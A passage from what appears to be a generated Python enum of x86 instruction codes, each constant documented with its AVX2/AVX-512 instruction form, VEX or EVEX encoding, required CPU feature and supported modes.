``AVX512VL and AVX512_VNNI``
``16/32/64-bit``
"""
EVEX_VPDPBUSD_ZMM_K1Z_ZMM_ZMMM512B32: int = 3073
"""
``VPDPBUSD zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.66.0F38.W0 50 /r``
``AVX512_VNNI``
``16/32/64-bit``
"""
EVEX_VPDPBUSDS_XMM_K1Z_XMM_XMMM128B32: int = 3074
"""
``VPDPBUSDS xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 51 /r``
``AVX512VL and AVX512_VNNI``
``16/32/64-bit``
"""
EVEX_VPDPBUSDS_YMM_K1Z_YMM_YMMM256B32: int = 3075
"""
``VPDPBUSDS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 51 /r``
``AVX512VL and AVX512_VNNI``
``16/32/64-bit``
"""
EVEX_VPDPBUSDS_ZMM_K1Z_ZMM_ZMMM512B32: int = 3076
"""
``VPDPBUSDS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.66.0F38.W0 51 /r``
``AVX512_VNNI``
``16/32/64-bit``
"""
EVEX_VPDPWSSD_XMM_K1Z_XMM_XMMM128B32: int = 3077
"""
``VPDPWSSD xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 52 /r``
``AVX512VL and AVX512_VNNI``
``16/32/64-bit``
"""
EVEX_VPDPWSSD_YMM_K1Z_YMM_YMMM256B32: int = 3078
"""
``VPDPWSSD ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 52 /r``
``AVX512VL and AVX512_VNNI``
``16/32/64-bit``
"""
EVEX_VPDPWSSD_ZMM_K1Z_ZMM_ZMMM512B32: int = 3079
"""
``VPDPWSSD zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.66.0F38.W0 52 /r``
``AVX512_VNNI``
``16/32/64-bit``
"""
EVEX_VDPBF16PS_XMM_K1Z_XMM_XMMM128B32: int = 3080
"""
``VDPBF16PS xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.F3.0F38.W0 52 /r``
``AVX512VL and AVX512_BF16``
``16/32/64-bit``
"""
EVEX_VDPBF16PS_YMM_K1Z_YMM_YMMM256B32: int = 3081
"""
``VDPBF16PS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.F3.0F38.W0 52 /r``
``AVX512VL and AVX512_BF16``
``16/32/64-bit``
"""
EVEX_VDPBF16PS_ZMM_K1Z_ZMM_ZMMM512B32: int = 3082
"""
``VDPBF16PS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.F3.0F38.W0 52 /r``
``AVX512F and AVX512_BF16``
``16/32/64-bit``
"""
EVEX_VP4DPWSSD_ZMM_K1Z_ZMMP3_M128: int = 3083
"""
``VP4DPWSSD zmm1 {k1}{z}, zmm2+3, m128``
``EVEX.512.F2.0F38.W0 52 /r``
``AVX512_4VNNIW``
``16/32/64-bit``
"""
EVEX_VPDPWSSDS_XMM_K1Z_XMM_XMMM128B32: int = 3084
"""
``VPDPWSSDS xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 53 /r``
``AVX512VL and AVX512_VNNI``
``16/32/64-bit``
"""
EVEX_VPDPWSSDS_YMM_K1Z_YMM_YMMM256B32: int = 3085
"""
``VPDPWSSDS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 53 /r``
``AVX512VL and AVX512_VNNI``
``16/32/64-bit``
"""
EVEX_VPDPWSSDS_ZMM_K1Z_ZMM_ZMMM512B32: int = 3086
"""
``VPDPWSSDS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.66.0F38.W0 53 /r``
``AVX512_VNNI``
``16/32/64-bit``
"""
EVEX_VP4DPWSSDS_ZMM_K1Z_ZMMP3_M128: int = 3087
"""
``VP4DPWSSDS zmm1 {k1}{z}, zmm2+3, m128``
``EVEX.512.F2.0F38.W0 53 /r``
``AVX512_4VNNIW``
``16/32/64-bit``
"""
EVEX_VPOPCNTB_XMM_K1Z_XMMM128: int = 3088
"""
``VPOPCNTB xmm1 {k1}{z}, xmm2/m128``
``EVEX.128.66.0F38.W0 54 /r``
``AVX512VL and AVX512_BITALG``
``16/32/64-bit``
"""
EVEX_VPOPCNTB_YMM_K1Z_YMMM256: int = 3089
"""
``VPOPCNTB ymm1 {k1}{z}, ymm2/m256``
``EVEX.256.66.0F38.W0 54 /r``
``AVX512VL and AVX512_BITALG``
``16/32/64-bit``
"""
EVEX_VPOPCNTB_ZMM_K1Z_ZMMM512: int = 3090
"""
``VPOPCNTB zmm1 {k1}{z}, zmm2/m512``
``EVEX.512.66.0F38.W0 54 /r``
``AVX512_BITALG``
``16/32/64-bit``
"""
EVEX_VPOPCNTW_XMM_K1Z_XMMM128: int = 3091
"""
``VPOPCNTW xmm1 {k1}{z}, xmm2/m128``
``EVEX.128.66.0F38.W1 54 /r``
``AVX512VL and AVX512_BITALG``
``16/32/64-bit``
"""
EVEX_VPOPCNTW_YMM_K1Z_YMMM256: int = 3092
"""
``VPOPCNTW ymm1 {k1}{z}, ymm2/m256``
``EVEX.256.66.0F38.W1 54 /r``
``AVX512VL and AVX512_BITALG``
``16/32/64-bit``
"""
EVEX_VPOPCNTW_ZMM_K1Z_ZMMM512: int = 3093
"""
``VPOPCNTW zmm1 {k1}{z}, zmm2/m512``
``EVEX.512.66.0F38.W1 54 /r``
``AVX512_BITALG``
``16/32/64-bit``
"""
EVEX_VPOPCNTD_XMM_K1Z_XMMM128B32: int = 3094
"""
``VPOPCNTD xmm1 {k1}{z}, xmm2/m128/m32bcst``
``EVEX.128.66.0F38.W0 55 /r``
``AVX512VL and AVX512_VPOPCNTDQ``
``16/32/64-bit``
"""
EVEX_VPOPCNTD_YMM_K1Z_YMMM256B32: int = 3095
"""
``VPOPCNTD ymm1 {k1}{z}, ymm2/m256/m32bcst``
``EVEX.256.66.0F38.W0 55 /r``
``AVX512VL and AVX512_VPOPCNTDQ``
``16/32/64-bit``
"""
EVEX_VPOPCNTD_ZMM_K1Z_ZMMM512B32: int = 3096
"""
``VPOPCNTD zmm1 {k1}{z}, zmm2/m512/m32bcst``
``EVEX.512.66.0F38.W0 55 /r``
``AVX512_VPOPCNTDQ``
``16/32/64-bit``
"""
EVEX_VPOPCNTQ_XMM_K1Z_XMMM128B64: int = 3097
"""
``VPOPCNTQ xmm1 {k1}{z}, xmm2/m128/m64bcst``
``EVEX.128.66.0F38.W1 55 /r``
``AVX512VL and AVX512_VPOPCNTDQ``
``16/32/64-bit``
"""
EVEX_VPOPCNTQ_YMM_K1Z_YMMM256B64: int = 3098
"""
``VPOPCNTQ ymm1 {k1}{z}, ymm2/m256/m64bcst``
``EVEX.256.66.0F38.W1 55 /r``
``AVX512VL and AVX512_VPOPCNTDQ``
``16/32/64-bit``
"""
EVEX_VPOPCNTQ_ZMM_K1Z_ZMMM512B64: int = 3099
"""
``VPOPCNTQ zmm1 {k1}{z}, zmm2/m512/m64bcst``
``EVEX.512.66.0F38.W1 55 /r``
``AVX512_VPOPCNTDQ``
``16/32/64-bit``
"""
VEX_VPBROADCASTD_XMM_XMMM32: int = 3100
"""
``VPBROADCASTD xmm1, xmm2/m32``
``VEX.128.66.0F38.W0 58 /r``
``AVX2``
``16/32/64-bit``
"""
VEX_VPBROADCASTD_YMM_XMMM32: int = 3101
"""
``VPBROADCASTD ymm1, xmm2/m32``
``VEX.256.66.0F38.W0 58 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPBROADCASTD_XMM_K1Z_XMMM32: int = 3102
"""
``VPBROADCASTD xmm1 {k1}{z}, xmm2/m32``
``EVEX.128.66.0F38.W0 58 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPBROADCASTD_YMM_K1Z_XMMM32: int = 3103
"""
``VPBROADCASTD ymm1 {k1}{z}, xmm2/m32``
``EVEX.256.66.0F38.W0 58 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPBROADCASTD_ZMM_K1Z_XMMM32: int = 3104
"""
``VPBROADCASTD zmm1 {k1}{z}, xmm2/m32``
``EVEX.512.66.0F38.W0 58 /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_VPBROADCASTQ_XMM_XMMM64: int = 3105
"""
``VPBROADCASTQ xmm1, xmm2/m64``
``VEX.128.66.0F38.W0 59 /r``
``AVX2``
``16/32/64-bit``
"""
VEX_VPBROADCASTQ_YMM_XMMM64: int = 3106
"""
``VPBROADCASTQ ymm1, xmm2/m64``
``VEX.256.66.0F38.W0 59 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VBROADCASTI32X2_XMM_K1Z_XMMM64: int = 3107
"""
``VBROADCASTI32X2 xmm1 {k1}{z}, xmm2/m64``
``EVEX.128.66.0F38.W0 59 /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VBROADCASTI32X2_YMM_K1Z_XMMM64: int = 3108
"""
``VBROADCASTI32X2 ymm1 {k1}{z}, xmm2/m64``
``EVEX.256.66.0F38.W0 59 /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VBROADCASTI32X2_ZMM_K1Z_XMMM64: int = 3109
"""
``VBROADCASTI32X2 zmm1 {k1}{z}, xmm2/m64``
``EVEX.512.66.0F38.W0 59 /r``
``AVX512DQ``
``16/32/64-bit``
"""
EVEX_VPBROADCASTQ_XMM_K1Z_XMMM64: int = 3110
"""
``VPBROADCASTQ xmm1 {k1}{z}, xmm2/m64``
``EVEX.128.66.0F38.W1 59 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPBROADCASTQ_YMM_K1Z_XMMM64: int = 3111
"""
``VPBROADCASTQ ymm1 {k1}{z}, xmm2/m64``
``EVEX.256.66.0F38.W1 59 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPBROADCASTQ_ZMM_K1Z_XMMM64: int = 3112
"""
``VPBROADCASTQ zmm1 {k1}{z}, xmm2/m64``
``EVEX.512.66.0F38.W1 59 /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_VBROADCASTI128_YMM_M128: int = 3113
"""
``VBROADCASTI128 ymm1, m128``
``VEX.256.66.0F38.W0 5A /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VBROADCASTI32X4_YMM_K1Z_M128: int = 3114
"""
``VBROADCASTI32X4 ymm1 {k1}{z}, m128``
``EVEX.256.66.0F38.W0 5A /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VBROADCASTI32X4_ZMM_K1Z_M128: int = 3115
"""
``VBROADCASTI32X4 zmm1 {k1}{z}, m128``
``EVEX.512.66.0F38.W0 5A /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VBROADCASTI64X2_YMM_K1Z_M128: int = 3116
"""
``VBROADCASTI64X2 ymm1 {k1}{z}, m128``
``EVEX.256.66.0F38.W1 5A /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VBROADCASTI64X2_ZMM_K1Z_M128: int = 3117
"""
``VBROADCASTI64X2 zmm1 {k1}{z}, m128``
``EVEX.512.66.0F38.W1 5A /r``
``AVX512DQ``
``16/32/64-bit``
"""
EVEX_VBROADCASTI32X8_ZMM_K1Z_M256: int = 3118
"""
``VBROADCASTI32X8 zmm1 {k1}{z}, m256``
``EVEX.512.66.0F38.W0 5B /r``
``AVX512DQ``
``16/32/64-bit``
"""
EVEX_VBROADCASTI64X4_ZMM_K1Z_M256: int = 3119
"""
``VBROADCASTI64X4 zmm1 {k1}{z}, m256``
``EVEX.512.66.0F38.W1 5B /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPEXPANDB_XMM_K1Z_XMMM128: int = 3120
"""
``VPEXPANDB xmm1 {k1}{z}, xmm2/m128``
``EVEX.128.66.0F38.W0 62 /r``
``AVX512VL and AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPEXPANDB_YMM_K1Z_YMMM256: int = 3121
"""
``VPEXPANDB ymm1 {k1}{z}, ymm2/m256``
``EVEX.256.66.0F38.W0 62 /r``
``AVX512VL and AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPEXPANDB_ZMM_K1Z_ZMMM512: int = 3122
"""
``VPEXPANDB zmm1 {k1}{z}, zmm2/m512``
``EVEX.512.66.0F38.W0 62 /r``
``AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPEXPANDW_XMM_K1Z_XMMM128: int = 3123
"""
``VPEXPANDW xmm1 {k1}{z}, xmm2/m128``
``EVEX.128.66.0F38.W1 62 /r``
``AVX512VL and AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPEXPANDW_YMM_K1Z_YMMM256: int = 3124
"""
``VPEXPANDW ymm1 {k1}{z}, ymm2/m256``
``EVEX.256.66.0F38.W1 62 /r``
``AVX512VL and AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPEXPANDW_ZMM_K1Z_ZMMM512: int = 3125
"""
``VPEXPANDW zmm1 {k1}{z}, zmm2/m512``
``EVEX.512.66.0F38.W1 62 /r``
``AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPCOMPRESSB_XMMM128_K1Z_XMM: int = 3126
"""
``VPCOMPRESSB xmm1/m128 {k1}{z}, xmm2``
``EVEX.128.66.0F38.W0 63 /r``
``AVX512VL and AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPCOMPRESSB_YMMM256_K1Z_YMM: int = 3127
"""
``VPCOMPRESSB ymm1/m256 {k1}{z}, ymm2``
``EVEX.256.66.0F38.W0 63 /r``
``AVX512VL and AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPCOMPRESSB_ZMMM512_K1Z_ZMM: int = 3128
"""
``VPCOMPRESSB zmm1/m512 {k1}{z}, zmm2``
``EVEX.512.66.0F38.W0 63 /r``
``AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPCOMPRESSW_XMMM128_K1Z_XMM: int = 3129
"""
``VPCOMPRESSW xmm1/m128 {k1}{z}, xmm2``
``EVEX.128.66.0F38.W1 63 /r``
``AVX512VL and AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPCOMPRESSW_YMMM256_K1Z_YMM: int = 3130
"""
``VPCOMPRESSW ymm1/m256 {k1}{z}, ymm2``
``EVEX.256.66.0F38.W1 63 /r``
``AVX512VL and AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPCOMPRESSW_ZMMM512_K1Z_ZMM: int = 3131
"""
``VPCOMPRESSW zmm1/m512 {k1}{z}, zmm2``
``EVEX.512.66.0F38.W1 63 /r``
``AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPBLENDMD_XMM_K1Z_XMM_XMMM128B32: int = 3132
"""
``VPBLENDMD xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 64 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPBLENDMD_YMM_K1Z_YMM_YMMM256B32: int = 3133
"""
``VPBLENDMD ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 64 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPBLENDMD_ZMM_K1Z_ZMM_ZMMM512B32: int = 3134
"""
``VPBLENDMD zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.66.0F38.W0 64 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPBLENDMQ_XMM_K1Z_XMM_XMMM128B64: int = 3135
"""
``VPBLENDMQ xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 64 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPBLENDMQ_YMM_K1Z_YMM_YMMM256B64: int = 3136
"""
``VPBLENDMQ ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 64 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPBLENDMQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 3137
"""
``VPBLENDMQ zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F38.W1 64 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VBLENDMPS_XMM_K1Z_XMM_XMMM128B32: int = 3138
"""
``VBLENDMPS xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 65 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VBLENDMPS_YMM_K1Z_YMM_YMMM256B32: int = 3139
"""
``VBLENDMPS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 65 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VBLENDMPS_ZMM_K1Z_ZMM_ZMMM512B32: int = 3140
"""
``VBLENDMPS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.66.0F38.W0 65 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VBLENDMPD_XMM_K1Z_XMM_XMMM128B64: int = 3141
"""
``VBLENDMPD xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 65 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VBLENDMPD_YMM_K1Z_YMM_YMMM256B64: int = 3142
"""
``VBLENDMPD ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 65 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VBLENDMPD_ZMM_K1Z_ZMM_ZMMM512B64: int = 3143
"""
``VBLENDMPD zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F38.W1 65 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPBLENDMB_XMM_K1Z_XMM_XMMM128: int = 3144
"""
``VPBLENDMB xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F38.W0 66 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPBLENDMB_YMM_K1Z_YMM_YMMM256: int = 3145
"""
``VPBLENDMB ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F38.W0 66 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPBLENDMB_ZMM_K1Z_ZMM_ZMMM512: int = 3146
"""
``VPBLENDMB zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F38.W0 66 /r``
``AVX512BW``
``16/32/64-bit``
"""
EVEX_VPBLENDMW_XMM_K1Z_XMM_XMMM128: int = 3147
"""
``VPBLENDMW xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F38.W1 66 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPBLENDMW_YMM_K1Z_YMM_YMMM256: int = 3148
"""
``VPBLENDMW ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F38.W1 66 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPBLENDMW_ZMM_K1Z_ZMM_ZMMM512: int = 3149
"""
``VPBLENDMW zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F38.W1 66 /r``
``AVX512BW``
``16/32/64-bit``
"""
EVEX_VP2INTERSECTD_KP1_XMM_XMMM128B32: int = 3150
"""
``VP2INTERSECTD k1+1, xmm2, xmm3/m128/m32bcst``
``EVEX.128.F2.0F38.W0 68 /r``
``AVX512VL and AVX512_VP2INTERSECT``
``16/32/64-bit``
"""
EVEX_VP2INTERSECTD_KP1_YMM_YMMM256B32: int = 3151
"""
``VP2INTERSECTD k1+1, ymm2, ymm3/m256/m32bcst``
``EVEX.256.F2.0F38.W0 68 /r``
``AVX512VL and AVX512_VP2INTERSECT``
``16/32/64-bit``
"""
EVEX_VP2INTERSECTD_KP1_ZMM_ZMMM512B32: int = 3152
"""
``VP2INTERSECTD k1+1, zmm2, zmm3/m512/m32bcst``
``EVEX.512.F2.0F38.W0 68 /r``
``AVX512F and AVX512_VP2INTERSECT``
``16/32/64-bit``
"""
EVEX_VP2INTERSECTQ_KP1_XMM_XMMM128B64: int = 3153
"""
``VP2INTERSECTQ k1+1, xmm2, xmm3/m128/m64bcst``
``EVEX.128.F2.0F38.W1 68 /r``
``AVX512VL and AVX512_VP2INTERSECT``
``16/32/64-bit``
"""
EVEX_VP2INTERSECTQ_KP1_YMM_YMMM256B64: int = 3154
"""
``VP2INTERSECTQ k1+1, ymm2, ymm3/m256/m64bcst``
``EVEX.256.F2.0F38.W1 68 /r``
``AVX512VL and AVX512_VP2INTERSECT``
``16/32/64-bit``
"""
EVEX_VP2INTERSECTQ_KP1_ZMM_ZMMM512B64: int = 3155
"""
``VP2INTERSECTQ k1+1, zmm2, zmm3/m512/m64bcst``
``EVEX.512.F2.0F38.W1 68 /r``
``AVX512F and AVX512_VP2INTERSECT``
``16/32/64-bit``
"""
EVEX_VPSHLDVW_XMM_K1Z_XMM_XMMM128: int = 3156
"""
``VPSHLDVW xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F38.W1 70 /r``
``AVX512VL and AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPSHLDVW_YMM_K1Z_YMM_YMMM256: int = 3157
"""
``VPSHLDVW ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F38.W1 70 /r``
``AVX512VL and AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPSHLDVW_ZMM_K1Z_ZMM_ZMMM512: int = 3158
"""
``VPSHLDVW zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F38.W1 70 /r``
``AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPSHLDVD_XMM_K1Z_XMM_XMMM128B32: int = 3159
"""
``VPSHLDVD xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 71 /r``
``AVX512VL and AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPSHLDVD_YMM_K1Z_YMM_YMMM256B32: int = 3160
"""
``VPSHLDVD ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 71 /r``
``AVX512VL and AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPSHLDVD_ZMM_K1Z_ZMM_ZMMM512B32: int = 3161
"""
``VPSHLDVD zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.66.0F38.W0 71 /r``
``AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPSHLDVQ_XMM_K1Z_XMM_XMMM128B64: int = 3162
"""
``VPSHLDVQ xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 71 /r``
``AVX512VL and AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPSHLDVQ_YMM_K1Z_YMM_YMMM256B64: int = 3163
"""
``VPSHLDVQ ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 71 /r``
``AVX512VL and AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPSHLDVQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 3164
"""
``VPSHLDVQ zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F38.W1 71 /r``
``AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPSHRDVW_XMM_K1Z_XMM_XMMM128: int = 3165
"""
``VPSHRDVW xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F38.W1 72 /r``
``AVX512VL and AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPSHRDVW_YMM_K1Z_YMM_YMMM256: int = 3166
"""
``VPSHRDVW ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F38.W1 72 /r``
``AVX512VL and AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPSHRDVW_ZMM_K1Z_ZMM_ZMMM512: int = 3167
"""
``VPSHRDVW zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F38.W1 72 /r``
``AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VCVTNEPS2BF16_XMM_K1Z_XMMM128B32: int = 3168
"""
``VCVTNEPS2BF16 xmm1 {k1}{z}, xmm2/m128/m32bcst``
``EVEX.128.F3.0F38.W0 72 /r``
``AVX512VL and AVX512_BF16``
``16/32/64-bit``
"""
EVEX_VCVTNEPS2BF16_XMM_K1Z_YMMM256B32: int = 3169
"""
``VCVTNEPS2BF16 xmm1 {k1}{z}, ymm2/m256/m32bcst``
``EVEX.256.F3.0F38.W0 72 /r``
``AVX512VL and AVX512_BF16``
``16/32/64-bit``
"""
EVEX_VCVTNEPS2BF16_YMM_K1Z_ZMMM512B32: int = 3170
"""
``VCVTNEPS2BF16 ymm1 {k1}{z}, zmm2/m512/m32bcst``
``EVEX.512.F3.0F38.W0 72 /r``
``AVX512F and AVX512_BF16``
``16/32/64-bit``
"""
EVEX_VCVTNE2PS2BF16_XMM_K1Z_XMM_XMMM128B32: int = 3171
"""
``VCVTNE2PS2BF16 xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.F2.0F38.W0 72 /r``
``AVX512VL and AVX512_BF16``
``16/32/64-bit``
"""
EVEX_VCVTNE2PS2BF16_YMM_K1Z_YMM_YMMM256B32: int = 3172
"""
``VCVTNE2PS2BF16 ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.F2.0F38.W0 72 /r``
``AVX512VL and AVX512_BF16``
``16/32/64-bit``
"""
EVEX_VCVTNE2PS2BF16_ZMM_K1Z_ZMM_ZMMM512B32: int = 3173
"""
``VCVTNE2PS2BF16 zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.F2.0F38.W0 72 /r``
``AVX512F and AVX512_BF16``
``16/32/64-bit``
"""
EVEX_VPSHRDVD_XMM_K1Z_XMM_XMMM128B32: int = 3174
"""
``VPSHRDVD xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 73 /r``
``AVX512VL and AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPSHRDVD_YMM_K1Z_YMM_YMMM256B32: int = 3175
"""
``VPSHRDVD ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 73 /r``
``AVX512VL and AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPSHRDVD_ZMM_K1Z_ZMM_ZMMM512B32: int = 3176
"""
``VPSHRDVD zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.66.0F38.W0 73 /r``
``AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPSHRDVQ_XMM_K1Z_XMM_XMMM128B64: int = 3177
"""
``VPSHRDVQ xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 73 /r``
``AVX512VL and AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPSHRDVQ_YMM_K1Z_YMM_YMMM256B64: int = 3178
"""
``VPSHRDVQ ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 73 /r``
``AVX512VL and AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPSHRDVQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 3179
"""
``VPSHRDVQ zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F38.W1 73 /r``
``AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPERMI2B_XMM_K1Z_XMM_XMMM128: int = 3180
"""
``VPERMI2B xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F38.W0 75 /r``
``AVX512VL and AVX512_VBMI``
``16/32/64-bit``
"""
EVEX_VPERMI2B_YMM_K1Z_YMM_YMMM256: int = 3181
"""
``VPERMI2B ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F38.W0 75 /r``
``AVX512VL and AVX512_VBMI``
``16/32/64-bit``
"""
EVEX_VPERMI2B_ZMM_K1Z_ZMM_ZMMM512: int = 3182
"""
``VPERMI2B zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F38.W0 75 /r``
``AVX512_VBMI``
``16/32/64-bit``
"""
EVEX_VPERMI2W_XMM_K1Z_XMM_XMMM128: int = 3183
"""
``VPERMI2W xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F38.W1 75 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPERMI2W_YMM_K1Z_YMM_YMMM256: int = 3184
"""
``VPERMI2W ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F38.W1 75 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPERMI2W_ZMM_K1Z_ZMM_ZMMM512: int = 3185
"""
``VPERMI2W zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F38.W1 75 /r``
``AVX512BW``
``16/32/64-bit``
"""
